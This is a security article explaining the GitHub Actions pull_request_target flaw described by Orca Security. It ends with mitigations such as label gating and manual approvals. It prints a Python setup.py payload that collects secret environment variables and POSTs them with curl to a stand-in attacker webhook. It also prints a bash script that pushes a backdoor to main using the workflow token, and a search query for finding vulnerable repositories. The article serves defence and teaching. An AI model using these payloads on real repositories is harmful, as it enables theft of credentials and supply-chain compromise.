From Fork to RCE: Deconstructing the Orca Security GitHub Actions ExploitFollowing the attacker's path, from creating a malicious fork to exfiltrating API keys and pushing code to protected branches.

Introduction: The Nightmare Hiding in Your CI

Let's be brutally honest for a moment. Your GitHub Actions CI/CD pipeline, the one you've meticulously built to automate, test, and deploy your code, is very likely a gaping security wound. This isn't a theoretical "what if." This is a real, documented exploit path that security researchers at Orca Security, led by Roin Firon (roin-orca), dubbed the "Pull Request Nightmare." And they didn't just find it in a few hobbyist projects; they found this critical vulnerability in the public repositories of giants like Google, Microsoft, and other Fortune-500 companies. If it can happen to them, it's almost certainly happening to you. The flaw is so simple, so subtle, and so deeply rooted in a common developer misunderstanding that it's one of the most dangerous risks in the modern software supply chain.

The entire exploit hinges on a single, misunderstood trigger: pull_request_target. It looks just like its safe cousin, pull_request, but it has one "feature" that changes everything. Unlike pull_request, which safely runs in the context of the fork with no access to your secrets, pull_request_target runs in the context of your base repository. This means it has full, unadulterated access to your GITHUB_TOKEN (which often has write permissions) and every single secret you've stored in your repo's settings, from NPM_TOKEN to AWS_SECRET_KEY. This trigger was intended for harmless meta-tasks like labeling or commenting on PRs. But developers, needing to run tests that require secrets, started using it to check out and run untrusted code. In doing so, they built a perfect, automated backdoor for any attacker on the internet.

The Vulnerable Setup: A Two-Line Time Bomb

The vulnerability isn't complex. It doesn't require a buffer overflow or a 0-day. It's a two-line mistake in a single YAML file. You are vulnerable if any workflow in your .github/workflows directory contains both of these elements:

  1. The Trigger: on: pull_request_target
  2. The Checkout: A step that checks out the untrusted code from the pull request, most commonly uses: actions/checkout@v4 with the ref set to github.event.pull_request.head.sha.

Why would any developer, let alone one at a top-tier company, make this mistake? The motive is tragically simple. A developer wants to run their full integration test suite against a PR from a fork. Those tests require secrets—a database connection string, a cloud API key, etc. They quickly discover that the standard pull_request trigger doesn't provide secrets to forks (a critical security feature!). So they search online and find pull_request_target, which does provide secrets. They switch the trigger, add the checkout step to get the PR's code, and voilà, the tests run. They've solved their problem, but in the process, they've just created a public, unauthenticated Remote Code Execution (RCE) vulnerability.

This combination is the digital equivalent of finding a random USB stick in the parking lot and immediately plugging it into your production database server. The pull_request_target trigger provides the privilege (access to secrets) and the actions/checkout step provides the payload (the attacker's untrusted code). The workflow itself becomes the execution engine, dutifully running malicious code on a machine that has all of your keys. The attacker doesn't even have to hide what they are doing. They can create a PR titled "Fix typo" and hide their payload in a build script, knowing the automation will run it before any human ever gets a chance to review the code.

Step 1: The Fork and the Payload

Let's walk through the exact path an attacker takes. First, they are just a user on GitHub. They use GitHub's own search functionality to find vulnerable targets. A query like pull_request_target path:.github/workflows combined with head.sha reveals thousands of potential targets. Once they find your vulnerable repository, the "attack" begins, and it looks just like a normal open-source contribution. They click the "Fork" button. They now have their own copy of your repository.

In their fork, they craft their malicious payload. They don't need to touch your application code. They just need to modify a file that they know your CI process will execute. This could be the test script in package.json, a setup.py file, a Makefile, or any build script. The payload itself is shockingly simple. It's just a few lines of script designed to exfiltrate every secret the workflow has access to. Because the workflow runs on a standard runner, it has common tools like curl and bash, and all your secrets are conveniently exposed as environment variables.

Here's what an attacker might add to a Python project's setup.py file:

# In setup.py or a build script that runs during CI
import os
import subprocess
import json

print("--- Malicious payload initiated by attacker ---")
try:
    # All GitHub secrets are exposed as environment variables
    secrets = os.environ
    
    # Filter for valuable keys
    stolen_data = {}
    for key, value in secrets.items():
        if "TOKEN" in key.upper() or "SECRET" in key.upper() or "KEY" in key.upper() or "PASS" in key.upper():
            stolen_data[key] = value
            
    # Use curl to exfiltrate the data to an attacker-controlled server
    # This server is just a simple webhook endpoint
    payload = json.dumps(stolen_data)
    # The 'shell=True' is dangerous, but here it's the attacker running it
    subprocess.run(
        f"curl -X POST -H 'Content-Type: application/json' -d '{payload}' https://attacker-webhook-server.com/steal",
        shell=True
    )
    print("--- Secrets have been exfiltrated ---")
except Exception as e:
    print(f"Payload failed: {e}")

# The script might then continue normally to avoid suspicion
# ... original setup.py content ...

Step 2: The Pull Request and the RCE

The attacker commits their modified setup.py to their fork. Now, for the final, devastating step: they open a pull request from their fork to your repository's main branch. The title can be anything: "Fixing typo in README," "Update dependencies," or "Improve test coverage." The instant they click the "Create pull request" button, your repository's GitHub Actions pipeline springs into action. The pull_request_target trigger fires. It spins up a runner in the context of your repository, complete with all your production and staging secrets loaded into its environment.

The runner proceeds to the jobs section. It hits the vulnerable actions/checkout step and, as instructed, checks out the code from the attacker's PR. It then moves to the next step, like pip install -e . or npm install. This command executes the attacker's modified setup.py or package.json script. The Python script runs, collects all your environment variables containing "TOKEN," "SECRET," and "KEY," and POSTs them to the attacker's webhook. On the other side, the attacker simply watches their server logs. Within seconds, your AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, NPM_TOKEN, and DOCKER_PASSWORD all appear on their screen. This is a full-blown Remote Code Execution (RCE). The attacker has successfully run arbitrary code inside your trusted infrastructure.

The Aftermath: From Stolen Keys to Repository Takeover

The attack doesn't necessarily end with stolen secrets. As bad as that is—and it's catastrophic, as it can lead to supply chain attacks or massive cloud bills from crypto miners—it can get even worse. The GITHUB_TOKEN that is provided to the pull_request_target workflow has, by default, contents: write permission. This means the token itself can be used to push code directly to your repository. The attacker's payload doesn't just have to steal secrets; it can actively modify your source code.

This elevates the attack from data theft to a full repository takeover. An attacker's script, running inside your workflow, can use the provided GITHUB_TOKEN to configure Git, create a new commit—perhaps adding a subtle backdoor to your application's index.js—and push that commit directly to your main branch. No review. No approval. It just appears in your commit history, signed, sealed, and delivered by your own trusted automation. A user pulls the new main, and the backdoor is now on their machine. Your next deployment pushes that backdoor to production. This is the absolute worst-case scenario: the attacker hasn't just broken in; they've changed the locks and now live in the house.

Here's what that payload might look like in a simple shell script:

#!/bin/bash
echo "--- Malicious payload: Pushing to main ---"

# Configure git using the workflow's identity
git config --global user.email "bot@your-org.com"
git config --global user.name "Trusted CI Bot"

# Create a new backdoor file
echo "console.log('--- This is a backdoor ---');" > src/backdoor.js
git add src/backdoor.js
git commit -m "Add critical security patch"

# Use the workflow's GITHUB_TOKEN to push to main
# This works because pull_request_target's token has write access
# The URL format is https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/OWNER/REPO.git
git push "https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}" HEAD:main

echo "--- Malicious code pushed to main branch ---"

Conclusion: You've Been Breached, Now What?

The "Pull Request Nightmare" is a brutal lesson in the dangers of "copy-paste" development and misunderstanding the tools we use every day. This isn't a flaw in GitHub Actions; it's a flaw in our implementation, a classic case of using a powerful tool without respecting its security model. The fact that this pattern was found in repositories from the world's top tech companies proves that this is not a "junior developer" mistake. It's a systemic failure. The "brutally honest" truth is that if you have public repositories, you need to stop reading this article and go audit your workflows right now. Use the GitHub search pull_request_target path:.github/workflows and manually inspect every single file that appears.

If you find this pattern, you are vulnerable. The fix is to never, ever check out untrusted code in a privileged context. A PR from a fork is the very definition of untrusted code. If you must run workflows with secrets, you must put a human gate in place. The most secure methods are to trigger the workflow on a label (on: pull_request_target: { types: [labeled] }), which a maintainer only adds after a thorough code review, or to use GitHub Environments, which can be configured to require a manual approval from a reviewer before the job can run and access secrets. Your CI system is a primary target. Treat it like your production environment, because as far as an attacker is concerned, it is.